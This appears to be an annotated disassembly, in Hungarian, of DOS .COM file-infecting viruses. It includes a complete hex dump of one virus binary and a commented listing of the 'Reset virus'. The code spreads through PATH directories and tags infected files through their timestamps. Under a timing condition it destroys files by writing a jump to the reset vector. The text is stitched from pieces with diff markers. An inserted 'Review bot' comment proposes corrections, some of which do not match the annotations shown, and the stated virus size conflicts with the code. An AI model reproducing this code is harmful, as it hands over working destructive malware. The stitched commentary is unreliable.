02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D)
|
||||
02B9 81E1E0FF AND CX,FFE0 ;{Teljesen felesleges!}
|
||||
02BD 81C91F00 OR CX,001F ;M r volt fert”zve jelz‚s
|
||||
02C1 B80157 MOV AX,5701 ;Set Date & Time
|
||||
02C4 CD21 INT 21
|
||||
|
||||
|
||||
;A file lez r sa:
|
||||
|
||||
02C6 B43E MOV AH,3E ;Close Handle
|
||||
02C8 CD21 INT 21
|
||||
|
||||
|
||||
;Az eredeti attributtum vissza llˇt sa:
|
||||
|
||||
02CA B80143 MOV AX,4301 ;Set File Attributtum
|
||||
02CD 8B8C0800 MOV CX,[SI+0008] ;ERE_ATTR (0301)
|
||||
02D1 BA1F00 MOV DX,001F
|
||||
02D4 90 NOP
|
||||
02D5 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
02D7 CD21 INT 21
|
||||
|
||||
|
||||
;DTA vissza llˇt sa az eredeti cˇmre:
|
||||
|
||||
02D9 1E PUSH DS
|
||||
02DA B41A MOV AH,1A ;Set DTA
|
||||
02DC 8B940000 MOV DX,[SI+0000] ;ERE_DTA_OFS (02F9)
|
||||
02E0 8E9C0200 MOV DS,[SI+0002] ;ERE_DTA_SEG (02FB)
|
||||
02E4 CD21 INT 21
|
||||
02E6 1F POP DS
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; Az eredeti program futtat sa:
|
||||
;-----------------------------------------
|
||||
|
||||
02E7 59 POP CX ;CX vissza llˇt sa
|
||||
02E8 33C0 XOR AX,AX ;Regiszterek null z sa
|
||||
02EA 33DB XOR BX,BX
|
||||
02EC 33D2 XOR DX,DX
|
||||
02EE 33F6 XOR SI,SI
|
||||
02F0 BF0001 MOV DI,0100
|
||||
02F3 57 PUSH DI ;0100 a stackre
|
||||
02F4 33FF XOR DI,DI
|
||||
02F6 C2FFFF RET FFFF ;100-on folytat˘dik a vez‚rl‚s
|
||||
;SP-- {Hogy minek?}
|
||||
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; ADAT TERšLET
|
||||
;-----------------------------------------
|
||||
|
||||
|
||||
;Ide mutat (02F9-re) a vˇrus elej‚n DX, k‚s”bb SI,BX.
|
||||
|
||||
02F9 ERE_DTA_OFS DW (?) ;[SI+00] Eredeti DTA cˇme
|
||||
02FB ERE_DTA_SEG DW (?) ;[SI+02]
|
||||
|
||||
02FD ERE_TIME DW (?) ;[SI+04] A file eredeti ideje,
|
||||
02FF ERE_DATE DW (?) ;[SI+06] d tuma,
|
||||
0301 ERE_ATTR DW (?) ;[SI+08] attributtuma
|
||||
|
||||
0303 ERE_KEZD DB 3 DUP (?) ;[SI+0A]
|
||||
;A file eredeti els” 3 byteja.
|
||||
|
||||
;A k”vetkez” 3 byteon lesz az a 3 byte , amit a vˇrus egy meg-
|
||||
;fert”zend” file elej‚re fog ˇrni.
|
||||
|
||||
0306 B_JMP DB E9 ;[SI+0D]
|
||||
;JMP g‚pik˘dja
|
||||
0307 CIM_JMP DW (?) ;Eltol s (JMP operandusa)
|
||||
|
||||
0309 KERES_STR DB '*.COM',0 ;[SI+10]
|
||||
;Ezt a stringet m solja a
|
||||
;FILE_NEV_MUT cˇmre
|
||||
|
||||
030F PATH_MUT DW (?) ;[SI+16]
|
||||
;Hol a k”vetkez” aldirectory neve
|
||||
;az environmenten.
|
||||
|
||||
0311 FILE_NEV_MUT DW (?) ;[SI+18]
|
||||
;Az tm solt aldirectory m”g‚ mu-
|
||||
;tat.
|
||||
;Azt mutatja , hogy hova kell a
|
||||
;keres‚si stringet(*.COM), majd a
|
||||
;file nev‚t m solni a FILE_PATH-
|
||||
;on bel<65>l ahhoz, hogy teljes utat
|
||||
;kapjunk.
|
||||
|
||||
0313 STR_PATH DB 'PATH=' ;[SI+1A] Ezt a stringet keresi az
|
||||
;environment ter<65>leten.
|
||||
|
||||
0318 FILE_PATH DB 40 DUP (?);[SI+1F]
|
||||
;Itt lesz majd a keres‚si string
|
||||
;‚s a fert”zend” file neve Łttal
|
||||
;egy<67>tt.
|
||||
|
||||
|
||||
;Ide mutat a DTA. Ezt a ter<65>letet fogja a DOS a file adataival
|
||||
;felt”lteni.
|
||||
|
||||
0358 ENTRY DB 15 DUP (?);Fenntartott [SI+5F]
|
||||
036D ENT_ATTR DB (?) ;Attributtum [SI+74]
|
||||
036E ENT_IDO DW (?) ;Keletkez‚s ideje [SI+75]
|
||||
0370 ENT_DATUM DW (?) ;Keletkez‚s d tuma [SI+77]
|
||||
0372 ENT_HOSSZ DW (?) ;Als˘ sz˘ [SI+79]
|
||||
0374 DW (?) ;Fels” sz˘ [SI+7B]
|
||||
0376 ENT_NEV DB 0D DUP (?);Megtal lt file neve [SI+7D]
|
||||
|
||||
0383 RESET DB EA,F0,FF,00,F0 ;JMP F000:FFF0 [SI+8A]
|
||||
;Nem haszn lja
|
||||
|
||||
;----------------------------------------------------
|
||||
; A T”lt”get”t behŁz˘ r‚sz
|
||||
;----------------------------------------------------
|
||||
|
||||
|
||||
0388 50 PUSH AX ;Regiszterek elment‚se
|
||||
0389 53 PUSH BX
|
||||
038A 51 PUSH CX
|
||||
038B 52 PUSH DX
|
||||
038C 06 PUSH ES
|
||||
038D 1E PUSH DS
|
||||
038E 57 PUSH DI
|
||||
038F 56 PUSH SI
|
||||
0390 E80000 CALL 0393 ;Lebuk s !! (/g)
|
||||
0393 5B POP BX ;BX=0393
|
||||
|
||||
;A: BOOT beolvas sa/T”lt”get” lek‚rdez‚se
|
||||
|
||||
0394 BEA55A MOV SI,5AA5 ;T”lt”get” lek‚rdez‚se
|
||||
0397 BFAA55 MOV DI,55AA
|
||||
039A 0E PUSH CS
|
||||
039B 07 POP ES
|
||||
039C 81C3E803 ADD BX,03E8 ;BX=077B
|
||||
03A0 81FBE803 CMP BX,03E8
|
||||
03A4 7303 JNB 03A9
|
||||
03A6 E98200 JMP 042B ;Ha nincs el‚g szabad mem˘ria a szegmensen
|
||||
03A9 53 PUSH BX
|
||||
03AA B80102 MOV AX,0201 ;A:BOOT beolvas sa
|
||||
03AD BA0000 MOV DX,0000
|
||||
03B0 B90100 MOV CX,0001
|
||||
03B3 CD13 INT 13
|
||||
03B5 5B POP BX
|
||||
03B6 7308 JNB 03C0
|
||||
03B8 80FC06 CMP AH,06 ;Ha lemezcsere volt, az nem hiba
|
||||
03BB 74EC JZ 03A9
|
||||
03BD EB6C JMP 042B ;Val˘di hiba->v‚ge
|
||||
03BF 90 NOP
|
||||
03C0 81FE5AA5 CMP SI,A55A
|
||||
03C4 7465 JZ 042B ;V‚ge, ha a T”lt”get” m r a mem˘ri ban van
|
||||
|
||||
;Van-e el‚g szabad mem˘ria a T”lt”get” beolvas s hoz
|
||||
|
||||
03C6 8CC8 MOV AX,CS
|
||||
03C8 050010 ADD AX,1000
|
||||
03CB 53 PUSH BX
|
||||
03CC 50 PUSH AX
|
||||
03CD CD12 INT 12 ;Max mem.
|
||||
03CF BB4000 MOV BX,0040
|
||||
03D2 F7E3 MUL BX ;AX-ben a mem˘ria tetej‚nek szegmense
|
||||
03D4 2D0010 SUB AX,1000 ;legal bb 4Kb kell a T”lt”get”nek
|
||||
03D7 8BD8 MOV BX,AX
|
||||
03D9 58 POP AX ;CS+1000
|
||||
03DA 3BD8 CMP BX,AX
|
||||
03DC 7304 JNB 03E2
|
||||
03DE 5B POP BX
|
||||
03DF EB4A JMP 042B ;V‚ge, ha nincs el‚g szabad mem˘ria
|
||||
03E1 90 NOP
|
||||
|
||||
; A lemez ut˘ls˘ s vj nak megkeres‚se
|
||||
|
||||
03E2 5B POP BX ;BX=077B
|
||||
03E3 8EC0 MOV ES,AX ;Max mem-1000
|
||||
03E5 2E CS:
|
||||
03E6 8B4718 MOV AX,[BX+18] ;S v hossza
|
||||
03E9 2E CS:
|
||||
03EA 8B4F1A MOV CX,[BX+1A] ;Oldalak sz ma
|
||||
03ED F7E1 MUL CX
|
||||
03EF 8BC8 MOV CX,AX ;Egy cilinder nagys ga
|
||||
03F1 2E CS:
|
||||
03F2 8B4713 MOV AX,[BX+13] ;Szektorok sz ma
|
||||
03F5 BA0000 MOV DX,0000
|
||||
03F8 F7F1 DIV CX ;Osztva a cilinder nagys g val AL-ben a s v
|
||||
|
||||
; Az ut˘ls˘ s v beolvas sa
|
||||
|
||||
03FA 81EBE803 SUB BX,03E8 ;BX=0393
|
||||
03FE 53 PUSH BX
|
||||
03FF 8AE8 MOV CH,AL ;40/80-dik s v
|
||||
0401 B101 MOV CL,01
|
||||
0403 BB0001 MOV BX,0100 ;ES:BX-re olvas !
|
||||
0406 BA0000 MOV DX,0000
|
||||
0409 B80802 MOV AX,0208 ;8 szektor beolvas sa
|
||||
040C CD13 INT 13
|
||||
040E 5B POP BX
|
||||
040F 721A JB 042B ;Hib n l v‚ge
|
||||
|
||||
; Ha a T”lt”get”t tal l, elindˇtja
|
||||
|
||||
0411 53 PUSH BX
|
||||
0412 BB0001 MOV BX,0100
|
||||
0415 26 ES:
|
||||
0416 8B07 MOV AX,[BX]
|
||||
0418 3D5224 CMP AX,2452 ;Azonosˇt˘
|
||||
041B 5B POP BX
|
||||
041C 750D JNZ 042B ;Ha nem T”lt”get”
|
||||
041E 8BC3 MOV AX,BX
|
||||
0420 059800 ADD AX,0098 ;AX=042B (A visszat‚r‚sre mutat)
|
||||
0423 0E PUSH CS
|
||||
0424 50 PUSH AX
|
||||
0425 B80A01 MOV AX,010A ;T”lt”get” bel‚p‚si pontja
|
||||
0428 06 PUSH ES
|
||||
0429 50 PUSH AX
|
||||
042A CB RETF
|
||||
|
||||
; Visszat‚r‚s
|
||||
|
||||
042B 5E POP SI ;Regiszterek vissza
|
||||
042C 5F POP DI
|
||||
042D 1F POP DS
|
||||
042E 07 POP ES
|
||||
042F 5A POP DX
|
||||
0430 59 POP CX
|
||||
0431 5B POP BX
|
||||
0432 58 POP AX
|
||||
0433 C3 RET
|
||||
0434 0000 DW 0000 ;???
|
||||
|
||||
|
||||
A vˇrus hexa dumpja :
|
||||
|
||||
|
||||
0100 51 BA F9 02 FC 8B F2 81-C6 0A 00 BF 00 01 B9 03 Q...............
|
||||
0110 00 F3 A4 8B F2 B4 30 CD-21 3C 00 75 03 E9 C7 01 ......0.!<.u....
|
||||
0120 06 B4 2F CD 21 89 9C 00-00 8C 84 02 00 E8 58 02 ../.!.........X.
|
||||
0130 07 BA 5F 00 90 03 D6 B4-1A CD 21 06 56 8E 06 2C .._.......!.V..,
|
||||
0140 00 BF 00 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ....^V..........
|
||||
0150 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 16 00 8B .....u...^......
|
||||
0160 FE 81 C7 1F 00 8B DE 81-C6 1F 00 8B FE EB 3A 83 ..............:.
|
||||
0170 BC 16 00 00 75 03 E9 60-01 1E 56 26 8E 1E 2C 00 ....u..`..V&..,.
|
||||
0180 8B FE 26 8B B5 16 00 81-C7 1F 00 AC 3C 3B 74 0A ..&.........<;t.
|
||||
0190 3C 00 74 03 AA EB F4 BE-00 00 5B 1F 89 B7 16 00 <.t.......[.....
|
||||
01A0 80 7D FF 5C 74 03 B0 5C-AA 89 BF 18 00 8B F3 81 .}.\t..\........
|
||||
01B0 C6 10 00 B9 06 00 F3 A4-8B F3 B4 4E BA 1F 00 90 ...........N....
|
||||
01C0 03 D6 B9 03 00 CD 21 EB-04 B4 4F CD 21 73 02 EB ......!...O.!s..
|
||||
01D0 9E 8B 84 75 00 24 1F 3C-1F 74 EE 81 BC 79 00 00 ...u.$.<.t...y..
|
||||
01E0 FA 77 E6 83 BC 79 00 0A-72 DF 8B BC 18 00 56 81 .w...y..r.....V.
|
||||
01F0 C6 7D 00 AC AA 3C 00 75-FA 5E B8 00 43 BA 1F 00 .}...<.u.^..C...
|
||||
0200 90 03 D6 CD 21 89 8C 08-00 B8 01 43 81 E1 FE FF ....!......C....
|
||||
0210 BA 1F 00 90 03 D6 CD 21-B8 02 3D BA 1F 00 90 03 .......!..=.....
|
||||
0220 D6 CD 21 73 03 E9 A2 00-8B D8 B8 00 57 CD 21 89 ..!s........W.!.
|
||||
0230 8C 04 00 89 94 06 00 B4-2C CD 21 80 E6 07 EB 0D ........,.!.....
|
||||
0240 90 B4 40 B9 05 00 8B D6-81 C2 8A 00 90 B4 3F B9 ..@...........?.
|
||||
0250 03 00 BA 0A 00 90 03 D6-CD 21 72 55 3D 03 00 75 .........!rU=..u
|
||||
0260 50 B8 02 42 B9 00 00 BA-00 00 CD 21 72 43 8B C8 P..B.......!rC..
|
||||
0270 2D 03 00 89 84 0E 00 81-C1 F9 02 8B FE 81 EF F7 -...............
|
||||
0280 01 89 0D B4 40 B9 36 03-8B D6 81 EA F9 01 CD 21 ....@.6........!
|
||||
0290 72 1F 3D 36 03 75 1A B8-00 42 B9 00 00 BA 00 00 r.=6.u...B......
|
||||
02A0 CD 21 72 0D B4 40 B9 03-00 8B D6 81 C2 0D 00 CD .!r..@..........
|
||||
02B0 21 8B 94 06 00 8B 8C 04-00 81 E1 E0 FF 81 C9 1F !...............
|
||||
02C0 00 B8 01 57 CD 21 B4 3E-CD 21 B8 01 43 8B 8C 08 ...W.!.>.!..C...
|
||||
02D0 00 BA 1F 00 90 03 D6 CD-21 1E B4 1A 8B 94 00 00 ........!.......
|
||||
02E0 8E 9C 02 00 CD 21 1F 59-33 C0 33 DB 33 D2 33 F6 .....!.Y3.3.3.3.
|
||||
02F0 BF 00 01 57 33 FF C2 FF-FF 80 00 57 0B 96 01 21 ...W3......W...!
|
||||
0300 00 20 00 E9 00 00 E9 FD-0F 2A 2E 43 4F 4D 00 71 . .......*.COM.q
|
||||
0310 07 21 07 50 41 54 48 3D-54 45 53 5A 54 2E 43 4F .!.PATH=TESZT.CO
|
||||
0320 4D 00 4F 4D 00 20 20 20-20 20 20 20 20 20 20 20 M.OM.
|
||||
0330 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
|
||||
0340 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
|
||||
0350 20 20 20 20 20 20 20 20-03 3F 3F 3F 3F 3F 3F 3F .???????
|
||||
0360 3F 43 4F 4D 03 03 00 4B-09 A1 7D 73 6F 20 96 01 ?COM...K..}so ..
|
||||
0370 21 00 00 10 00 00 54 45-53 5A 54 2E 43 4F 4D 00 !.....TESZT.COM.
|
||||
0380 4F 4D 00 EA F0 FF 00 F0-50 53 51 52 06 1E 57 56 OM......PSQR..WV
|
||||
0390 E8 00 00 5B BE A5 5A BF-AA 55 0E 07 81 C3 E8 03 ...[..Z..U......
|
||||
03A0 81 FB E8 03 73 03 E9 82-00 53 B8 01 02 BA 00 00 ....s....S......
|
||||
03B0 B9 01 00 CD 13 5B 73 08-80 FC 06 74 EC EB 6C 90 .....[s....t..l.
|
||||
03C0 81 FE 5A A5 74 65 8C C8-05 00 10 53 50 CD 12 BB ..Z.te.....SP...
|
||||
03D0 40 00 F7 E3 2D 00 10 8B-D8 58 3B D8 73 04 5B EB @...-....X;.s.[.
|
||||
03E0 4A 90 5B 8E C0 2E 8B 47-18 2E 8B 4F 1A F7 E1 8B J.[....G...O....
|
||||
03F0 C8 2E 8B 47 13 BA 00 00-F7 F1 81 EB E8 03 53 8A ...G..........S.
|
||||
0400 E8 B1 01 BB 00 01 BA 00-00 B8 08 02 CD 13 5B 72 ..............[r
|
||||
0410 1A 53 BB 00 01 26 8B 07-3D 52 24 5B 75 0D 8B C3 .S...&..=R$[u...
|
||||
0420 05 98 00 0E 50 B8 0A 01-06 50 CB 5E 5F 1F 07 5A ....P....P.^_..Z
|
||||
0430 59 5B 58 C3 00 00 Y[X...
|
||||
|
|
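Review bot: The commentary in this listing contradicts the opcodes it annotates in several places, which will mislead anyone using it for triage: the comment on `CMP WORD PTR [SI+0079],FA00` says "64000h" but 0FA00h is 64000 decimal; the comment on `CMP AX,0336` says "648 byte" while 0336h is the 822 bytes stated in the header and at `MOV CX,0336`; the comment on `CMP WORD PTR [SI+0079],+0A` says "10h" for a decimal 10; and `MOV CX,[SI+0004]` is labelled "ERE_TIME (027D)" although the data area places ERE_TIME at 02FD. Suggest correcting those four comments to `;64000 (0FA00h)`, `;822 byte`, `;10` and `;ERE_TIME (02FD)` so the annotation agrees with the hex dump that follows. It would also help defenders to state explicitly at the 02B9–02BD write-back that the infection marker is the file timestamp's seconds field forced to 1Fh (an out-of-range 62 s), since that marker, together with the fixed 822-byte growth and the E9 jump written at offset 0, is what an on-disk scan for this family can key on.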
@ -0,0 +1,571 @@
Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari
(41) 21-033
Unassemble list:
114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere
114E:0103 49 DEC CX
114E:0104 60 DB 60
114E:0105 61 DB 61
114E:0106 6D DB 6D
114E:0107 206120 AND [BX+DI+20],AH
114E:010A 52 PUSH DX
114E:010B 65 DB 65
114E:010C 7365 JNB 0173
114E:010E 7420 JZ 0130
114E:0110 56 PUSH SI
114E:0111 49 DEC CX
114E:0112 52 PUSH DX
114E:0113 55 PUSH BP
114E:0114 53 PUSH BX
114E:0115 2124 AND [SI],SP
114E:0117 BA0301 MOV DX,0103 ;az eredeti fertozott
;program kezdete
114E:011A B409 MOV AH,09
114E:011C CD21 INT 21 ;uzenet kepernyore
114E:011E B400 MOV AH,00
114E:0120 CD20 INT 20 ;exit to DOS
114E:0122 51 PUSH CX ;stack-en marad
;a kovetkezo utasitas operandusat fertozeskor
;allitja be, igy mindig a helyes cimre mutat
114E:0123 BA1B03 MOV DX,031B
114E:0126 FC CLD ;elore
114E:0127 8BF2 MOV SI,DX
114E:0129 81C60A00 ADD SI,000A ;SI=031b eredeti 3 byte
114E:012D BF0001 MOV DI,0100 ;program eleje
114E:0130 B90300 MOV CX,0003 ;3 byte
114E:0133 F3 REPZ
114E:0134 A4 MOVSB ;eredeti JMP 117
;visszamasolasa
114E:0135 8BF2 MOV SI,DX
114E:0137 B430 MOV AH,30
114E:0139 CD21 INT 21 ;DOS verzio szam lekerd.
114E:013B 3C00 CMP AL,00
114E:013D 7503 JNZ 0142
114E:013F E9C701 JMP 0309 ;ha 00-as verzio akkor
;nem fertoz a virus s
;futtatja az eredeti
;programot
114E:0142 06 PUSH ES
114E:0143 B42F MOV AH,2F
114E:0145 CD21 INT 21 ;DTA. lekerdezese
114E:0147 899C0000 MOV [SI+0000],BX ;BX= 0080 offset
114E:014B 8C840200 MOV [SI+0002],ES ;eredeti DTA. mentese
114E:014F 07 POP ES
;DTA. beallitasa az ENTRY cimere /dir.-bol/
;ide masolja a find first a file adatait
114E:0150 BA5F00 MOV DX,005F ;DX=037a
114E:0153 90 NOP
114E:0154 03D6 ADD DX,SI
114E:0156 B41A MOV AH,1A
114E:0158 CD21 INT 21 ;DTA. letrehozasa
;037a-tol uj cimre
114E:015A 06 PUSH ES
114E:015B 56 PUSH SI
114E:015C 8E062C00 MOV ES,[002C] ;kornyezet szegmense
114E:0160 BF0000 MOV DI,0000 ;elejetol ES:DI fog a
;kovetkezo dir.-ra mu-
;tatni
114E:0163 5E POP SI
114E:0164 56 PUSH SI
114E:0165 81C61A00 ADD SI,001A ;ezen a cimen levo
;stringet keresi a
;kornyezetbe PATH
114E:0169 AC LODSB ;AL=DS:[SI],SI++
114E:016A B90080 MOV CX,8000 ;32 kbyte
114E:016D F2 REPNZ
114E:016E AE SCASB ;megkeresi a kovetke-
;zo P betut
114E:016F B90400 MOV CX,0004 ;a PATH feliratot keresi
114E:0172 AC LODSB
114E:0173 AE SCASB ;betunkent hasonlitja
114E:0174 75ED JNZ 0163 ;ha nem egyezik a DI.
;karakter /kov.betu/
114E:0176 E2FA LOOP 0172 ;egyezik beolvassa es
;osszehasonlitja a tobbi
;betut is
114E:0178 5E POP SI
114E:0179 07 POP ES ;ES:DI mutat az elso
;PATH-ra
114E:017A 89BC1600 MOV [SI+0016],DI ;a PATH= szo utani file
;spec. cimenek mentese
;PATH mutato
114E:017E 8BFE MOV DI,SI ;SI=031b
114E:0180 81C71F00 ADD DI,001F ;DI=033a
114E:0184 8BDE MOV BX,SI ;BX=031b ezutan BX mu-
;tat az adatokra
114E:0186 81C61F00 ADD SI,001F ;SI=033a
114E:018A 8BFE MOV DI,SI ;DI=033a
114E:018C EB3A JMP 01C8
;A kovetkezo PATH-ban megadott aldirectoryt
;File Path-ra masolja, igy a kovetkezo file-t
;ebben az aldirectoryban keresi
114E:018E 83BC160000 CMP WORD PTR [SI+0016],+00 ;
114E:0193 7503 JNZ 0198
114E:0195 E96301 JMP 02FB ;ha nincs osveny megadva
114E:0198 1E PUSH DS
114E:0199 56 PUSH SI
114E:019A 26 ES:
114E:019B 8E1E2C00 MOV DS,[002C] ;kornyezet szegmense
114E:019F 8BFE MOV DI,SI ;DI=033a
114E:01A1 26 ES:
114E:01A2 8BB51600 MOV SI,[DI+0016] ;a kornyezetbol a path
;masolasa ha az aktualis
;konyvtarban nem talalt
;fertozheto file-t
;a PATH= utanra mutat
;az SI
114E:01A6 81C71F00 ADD DI,001F
114E:01AA AC LODSB ;beolvas a kornyezetbol
;a 0029. byte-ot
114E:01AB 3C3B CMP AL,3B ;pontosvesszo ?
114E:01AD 740A JZ 01B9 ;igen
114E:01AF 3C00 CMP AL,00 ;PATH vege ? nem lesz
;tobb
114E:01B1 7403 JZ 01B6 ;igen
114E:01B3 AA STOSB ;letarol 033a-tol
114E:01B4 EBF4 JMP 01AA
114E:01B6 BE0000 MOV SI,0000
114E:01B9 5B POP BX ;BX=regi SI BX mutat
;az adatokra
114E:01BA 1F POP DS
114E:01BB 89B71600 MOV [BX+0016],SI
;a kovetkezo PATH-ban adott dir. mar atmasolva
114E:01BF 807DFF5C CMP BYTE PTR [DI-01],5C ; \ jel ?
114E:01C3 7403 JZ 01C8 ;igen
114E:01C5 B05C MOV AL,5C ;egyebkent \ iras
;egy aldir. kiertekelese, eloszor az aktualis, majd
;a file path -ra masolt aldir. vegignezese, fertozes
;DI a file path-ba irt aldir. neve utani poz.-ra mu-
;tat
;COM file keresese
114E:01C7 AA STOSB ;\ jel beirasa
114E:01C8 89BF1800 MOV [BX+0018],DI ;ide kell majd a
;file nevet masolni,
;az aldir. neve utan
114E:01CC 8BF3 MOV SI,BX ;SI=031b DI=033d
114E:01CE 81C61000 ADD SI,0010 ;SI=032b
114E:01D2 B90600 MOV CX,0006
114E:01D5 F3 REPZ
114E:01D6 A4 MOVSB ;a *.COM szoveg beirasa
;a PATH= szoveg utan
114E:01D7 8BF3 MOV SI,BX
114E:01D9 B44E MOV AH,4E ;a file adatai a DTA.
;alltal foglalt teru-
;letre
114E:01DB BA1F00 MOV DX,001F
114E:01DE 90 NOP
114E:01DF 03D6 ADD DX,SI
114E:01E1 B90300 MOV CX,0003
114E:01E4 CD21 INT 21 ;elso file bejegyzes ke-
;resese, az it. aktivi-
;zalasa utan felhozza a
;filemeretet, attrib.ot
;keletkezes datumat s
;idejet is!
114E:01E6 EB04 JMP 01EC ;vizsgalatra
114E:01E8 B44F MOV AH,4F
114E:01EA CD21 INT 21 ;kovetkezo file bejegy-
;zes keresese
114E:01EC 7302 JNB 01F0 ;ha nincs hiba
114E:01EE EB9E JMP 018E ;hiba eseten -ha nem
;talal tobb COM file-t
;mas aldirt keres
;mar talalt COM file-t, az adataival az entry fel
;van toltve, a file ellenorzese es fertozese
;kovetkezik
114E:01F0 8B847500 MOV AX,[SI+0075] ;a keletkezesi ido AX-be
;SI=0390
114E:01F4 241F AND AL,1F ;maszk 31 -el
114E:01F6 3C1F CMP AL,1F ;ha 31 akkor mar ferto-
;zott a file!
114E:01F8 74EE JZ 01E8 ;fertozott kovetkezo
;file-t keresi
114E:01FA 81BC790000FA CMP WORD PTR [SI+0079],FA00
114E:0200 77E6 JA 01E8 ;ha > a file meret
;64000 byte-nal
114E:0202 83BC79000A CMP WORD PTR [SI+0079],+0A
114E:0207 72DF JB 01E8 ;ha < 10 byte nal
114E:0209 8BBC1800 MOV DI,[SI+0018] ;DI=033a
;megvan a kivalasztott file
;a file nevet a filespec utan kell masolni
114E:020D 56 PUSH SI ;DI mutat a filespec.re,
;PATH=*.COM
114E:020E 81C67D00 ADD SI,007D ;SI=0398
114E:0212 AC LODSB ;atmasolja a filenevet
;/megkeresett elso v.
;x.edik bejegyzest/
114E:0213 AA STOSB
114E:0214 3C00 CMP AL,00 ;vegere ert ? nevle-
;zaro nullaig masol
114E:0216 75FA JNZ 0212 ;nem
114E:0218 5E POP SI ;SI ujra az adatokra mu-
;tat
;a file egyes eredeti informacioinak megorzese
;hogy a fertozese ne tunjon fel
;minek a file ATTR. megegyszer lekerdezni?
114E:0219 B80043 MOV AX,4300
114E:021C BA1F00 MOV DX,001F ;DS:DX = filespec.
114E:021F 90 NOP
114E:0220 03D6 ADD DX,SI ;DX=031b
114E:0222 CD21 INT 21 ;attributum lekerdezese
;7.6.5.4.3.2.1.0.
;x x a d v s h r
114E:0224 898C0800 MOV [SI+0008],CX ;attributum
114E:0228 B80143 MOV AX,4301
114E:022B 81E1FEFF AND CX,FFFE ;ha Read Only akkor ARC.
;ra valtoztatja
114E:022F BA1F00 MOV DX,001F
114E:0232 90 NOP
114E:0233 03D6 ADD DX,SI ;DX=033a
114E:0235 CD21 INT 21 ;attributum beallitasa
;file nyitasa
114E:0237 B8023D MOV AX,3D02
114E:023A BA1F00 MOV DX,001F
114E:023D 90 NOP
114E:023E 03D6 ADD DX,SI ;DS:DX = filespec.
114E:0240 CD21 INT 21 ;file nyitasa I/O ra
114E:0242 7303 JNB 0247
114E:0244 E9A500 JMP 02EC ;hiba eseten nincs
;fertozes
114E:0247 8BD8 MOV BX,AX ;handle
;a file idejenek lekerdezese de ez is megtalalhato az
;ENTRY teruleten
114E:0249 B80057 MOV AX,5700
114E:024C CD21 INT 21 ;file letrehozasi datum
;es ido bekerese
114E:024E 898C0400 MOV [SI+0004],CX ;ido CH-ora CL-perc
DH-sec DL-1/100
114E:0252 89940600 MOV [SI+0006],DX ;datum
114E:0256 B42C MOV AH,2C
114E:0258 CD21 INT 21 ;rendszerido bekerese
;annak eldontese hogy a filet tonkretegye-e
;ha a masodperc 7 akkor tonkreteszi /aktualis/
114E:025A 80E607 AND DH,07 ;sec = 7 ?
114E:025D 7510 JNZ 026F ;nem - nem tesz tonkre!
;file tonkretetele
114E:025F B440 MOV AH,40
114E:0261 B90500 MOV CX,0005
114E:0264 8BD6 MOV DX,SI ;reset
114E:0266 81C28A00 ADD DX,008A ;DX=03a7 : JMP F000:FFF0
114E:026A CD21 INT 21 ;file elejere ir 5 byte
;-ot a RESET re ugrast!
114E:026C EB65 JMP 02D3
114E:026E 90 NOP
;fertozes
;az eredeti 3 byte megorzese hogy kesobb meg futtatni
;lehessen
114E:026F B43F MOV AH,3F
114E:0271 B90300 MOV CX,0003
114E:0274 BA0A00 MOV DX,000A
114E:0277 90 NOP
114E:0278 03D6 ADD DX,SI ;DS:DX = puffer cima DTA
114E:027A CD21 INT 21 ;a program eredeti elso
;3 byte-jat beolvassa
114E:027C 7255 JB 02D3 ;ha hiba van
114E:027E 3D0300 CMP AX,0003 ;megvolt a 3 byte ?
114E:0281 7550 JNZ 02D3 ;nem
;file vegere allas az uj cimek kiszamitasa
114E:0283 B80242 MOV AX,4202
114E:0286 B90000 MOV CX,0000
114E:0289 BA0000 MOV DX,0000
114E:028C CD21 INT 21 ;file vegere pozicional
114E:028E 7243 JB 02D3 ;ha hiba volt -nem
;nagyon lehet hiba!
;file elejere irando JMP operandus kiszamitasa
114E:0290 8BC8 MOV CX,AX ;AX-ben filehossz
114E:0292 2D0300 SUB AX,0003 ;AX-ben eltolas a JMP
;utasitashoz amit a
;file elejere fog irni
;igy a JMP a file mos-
;tani vege utani bytera
;fog mutatni
114E:0295 89840E00 MOV [SI+000E],AX ;JMP cim
;az uj file-on beluli adatterulet cimenek ki-
;szamitasa es beallitasa
114E:0299 81C1F902 ADD CX,02F9 ;az uj file-on beluli
;adatteruletre mutat
114E:029D 8BFE MOV DI,SI
114E:029F 81EFF701 SUB DI,01F7 ;virus elso utasitasa-
;nak operandusanak
;cime
114E:02A3 890D MOV [DI],CX ;ide irja az adatterulet
;cimet
;file moge masolja magat
;filemutato a file vegere mutat
114E:02A5 B440 MOV AH,40
114E:02A7 B98802 MOV CX,0288 ;a VIRUS hossza
114E:02AA 8BD6 MOV DX,SI ;virus elso bytejara
;mutat
114E:02AC 81EAF901 SUB DX,01F9
114E:02B0 CD21 INT 21 ;a FERTOZES onmagat a
;program a fertozendo
;program moge irja
114E:02B2 721F JB 02D3 ;hiba eseten
114E:02B4 3D8802 CMP AX,0288 ;kiirta onmagat ?
114E:02B7 751A JNZ 02D3 ;igen
;az elso 3 byte atallitasa, egy file
;vegere mutato ugro utasitasra
114E:02B9 B80042 MOV AX,4200
114E:02BC B90000 MOV CX,0000
114E:02BF BA0000 MOV DX,0000
114E:02C2 CD21 INT 21 ;file pointer a vegere
114E:02C4 720D JB 02D3 ;ha volt hiba -nem le-
;het hiba!
114E:02C6 B440 MOV AH,40
114E:02C8 B90300 MOV CX,0003
114E:02CB 8BD6 MOV DX,SI
114E:02CD 81C20D00 ADD DX,000D ;DX=0329 ugro utasitasra
;mutat
114E:02D1 CD21 INT 21 ;3 byte kiirasa a fileba
;az eredeti ido -mar a fertozesjelzessel egyutt-
;visszaallitasa
114E:02D3 8B940600 MOV DX,[SI+0006] ;datum
114E:02D7 8B8C0400 MOV CX,[SI+0004] ;ido
114E:02DB 81E1E0FF AND CX,FFE0 ;sec=0 -felesleges!
114E:02DF 81C91F00 OR CX,001F ;sec=1f azaz 31, igy
;jelzi hogy mar ferto-
